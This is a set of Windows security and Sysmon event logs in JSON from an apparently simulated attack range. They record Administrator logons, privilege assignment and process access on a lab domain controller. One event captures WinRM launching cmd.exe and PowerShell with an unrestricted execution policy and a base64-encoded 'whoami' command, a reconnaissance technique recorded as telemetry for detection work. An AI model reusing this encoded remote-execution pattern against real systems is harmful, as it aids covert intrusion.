{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220358,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220359,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47F7D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E50135F7-BF80-2E10-0465-5DE964C29E4C}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x47f7d","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{E50135F7-BF80-2E10-0465-5DE964C29E4C}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220360,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47F7D\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x47f7d","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2538,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.235\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.235","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2539,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.235\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.235","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2540,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.252\r\nProcessGuid: {41C8662E-1F8C-5F25-0000-0010C17F0400}\r\nProcessId: 4472\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-1F8C-5F25-0000-0020B17C0400}\r\nLogonId: 0x47CB1\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F8C-5F25-0000-0010DF7C0400}\r\nParentProcessId: 4388\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.252","ProcessGuid":"{41C8662E-1F8C-5F25-0000-0010C17F0400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-1F8C-5F25-0000-0020B17C0400}","LogonId":"0x47cb1","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F8C-5F25-0000-0010DF7C0400}","ParentProcessId":"4388","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2541,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F8C-5F25-0000-0010DF7C0400}\r\nSourceProcessId: 4388\r\nSourceThreadId: 4444\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010C17F0400}\r\nTargetProcessId: 4472\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F8C-5F25-0000-0010DF7C0400}","SourceProcessId":"4388","SourceThreadId":"4444","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010C17F0400}","TargetProcessId":"4472","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2542,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010C17F0400}\r\nTargetProcessId: 4472\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010C17F0400}","TargetProcessId":"4472","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2543,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
